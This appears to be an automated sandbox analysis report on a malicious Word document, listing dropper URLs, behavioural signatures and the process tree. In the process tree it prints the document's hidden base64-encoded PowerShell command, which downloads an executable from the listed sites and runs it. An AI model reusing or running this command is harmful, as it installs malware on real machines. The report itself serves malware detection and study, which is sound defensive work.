Analysis
-
max time kernel
25s -
resource
win10v191014 -
submitted
12-12-2019 16:29
General
-
Target
5706b6a65cf2d7a5fe6863cc5621e4bf08a32639bfcc7f159c4921fe10d11f7c.doc
-
Sample
191212-swda8j1e3j
-
SHA256
5706b6a65cf2d7a5fe6863cc5621e4bf08a32639bfcc7f159c4921fe10d11f7c
Score
8/10
Malware Config
Extracted
Language
ps1
Source
URLs
exe.dropper
https://gizelemonteiro.com/wp-admin/5f8818855/
exe.dropper
https://edu.widion.com/wp-admin/vhds4257/
exe.dropper
http://mainguardmatrimony.com/wp-content/ak36/
exe.dropper
http://www.mediahubml.com/sdccrecap/2d84774/
exe.dropper
https://www.oshodrycleaning.com/aspnet_client/E/b2em3bp37795/
Signatures
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4928 WINWORD.EXE -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4928 WINWORD.EXE -
Executes dropped EXE 1 IoCs
pid Process 4684 11.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 4928 WINWORD.EXE 4684 11.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 4448 wrote to memory of 3996 4448 SppExtComObj.exe 76 PID 3624 wrote to memory of 4684 3624 Powershell.exe 80 -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3624 Powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3624 Powershell.exe -
Checks system information in the registry 2 TTPs 2 IoCs
System information is often read in order to detect sandboxing environments.
description ioc Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5706b6a65cf2d7a5fe6863cc5621e4bf08a32639bfcc7f159c4921fe10d11f7c.doc" /o ""1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4928
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
- Suspicious use of WriteProcessMemory
PID:4448 -
C:\Windows\System32\SLUI.exe"C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent2⤵PID:3996
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABQAGoAZgBvAG0AYgBtAHoAYQBqAGMAPQAnAFgAcQBzAHcAaABqAHkAawBiAHMAdgB2AHAAJwA7ACQASwB0AHMAbQB1AGQAYgBjAHUAbgBxAHgAIAA9ACAAJwAxADEAJwA7ACQAQQBsAGMAYwB0AHkAbQBtAGIAdQA9ACcASwB0AGkAagBxAGQAZABtAGIAcQAnADsAJABaAGoAZwBuAHcAcgBxAGcAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEsAdABzAG0AdQBkAGIAYwB1AG4AcQB4ACsAJwAuAGUAeABlACcAOwAkAEkAYwBuAHEAagB0AHgAYgBzAHEAegA9ACcAQgBmAHoAZABnAHUAbgB3ACcAOwAkAFcAYgBoAGsAdQBuAGYAZgBkAD0AJgAoACcAbgBlAHcALQBvACcAKwAnAGIAagBlACcAKwAnAGMAdAAnACkAIABuAEUAVAAuAFcARQBiAEMAbABpAEUATgB0ADsAJABOAGwAYwBuAGYAawBtAGsAPQAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAegBlAGwAZQBtAG8AbgB0AGUAaQByAG8ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADUAZgA4ADgAMQA4ADgANQA1AC8AKgBoAHQAdABwAHMAOgAvAC8AZQBkAHUALgB3AGkAZABpAG8AbgAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AdgBoAGQAcwA0ADIANQA3AC8AKgBoAHQAdABwADoALwAvAG0AYQBpAG4AZwB1AGEAcgBkAG0AYQB0AHIAaQBtAG8AbgB5AC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AYQBrADMANgAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAG0AZQBkAGkAYQBoAHUAYgBtAGwALgBjAG8AbQAvAHMAZABjAGMAcgBlAGMAYQBwAC8AMgBkADgANAA3ADcANAAvACoAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbwBzAGgAbwBkAHIAeQBjAGwAZQBhAG4AaQBuAGcALgBjAG8AbQAvAGEAcwBwAG4AZQB0AF8AYwBsAGkAZQBuAHQALwBFAC8AYgAyAGUAbQAzAGIAcAAzADcANwA5ADUALwAnAC4AIgBTAGAAcABsAEkAdAAiACgAJwAqACcAKQA7ACQASQBrAGwAZgBsAHcAaABoAGoAYwBuAHQAcQA9ACcAQwBpAHcAbABxAHQAdABrAGoAcAB5AGUAagAnADsAZgBvAHIAZQBhAGMAaAAoACQAWQB1AHUAdgBsAGgAcQBzAGIAeABkACAAaQBuACAAJABOAGwAYwBuAGYAawBtAGsAKQB7AHQAcgB5AHsAJABXAGIAaABrAHUAbgBmAGYAZAAuACIARABvAFcATgBgAGwATwBgAEEARABgAEYASQBsAGUAIgAoACQAWQB1AHUAdgBsAGgAcQBzAGIAeABkACwAIAAkAFoAagBnAG4AdwByAHEAZwApADsAJABWAHMAcwBkAGYAZwB4AG8AbQBmAGsAagBxAD0AJwBJAHAAbwBnAGQAbQBxAGsAegBmACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQAWgBqAGcAbgB3AHIAcQBnACkALgAiAEwAYABlAG4ARwBUAGgAIgAgAC0AZwBlACAAMwAwADkAOQAzACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAdABgAEEAcgBUACIAKAAkAFoAagBnAG4AdwByAHEAZwApADsAJABQAG4AcgB5AGwAbgBoAHYAPQAnAEUAcABlAHUAawBmAGcAagBkAHAAeAAnADsAYgByAGUAYQBrADsAJABRAGMAcgBpAGYAaABzAHgAcgBnAD0AJwBaAG8AbAB5AGMAbwBxAGgAYwBrAHEAegBzACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFQAdwBrAGsAZQBqAGQAYgB3AD0AJwBDAG8AaQBwAG0AagBpAHYAbAAnAA==1⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3624 -
C:\Users\Admin\11.exe"C:\Users\Admin\11.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4684
-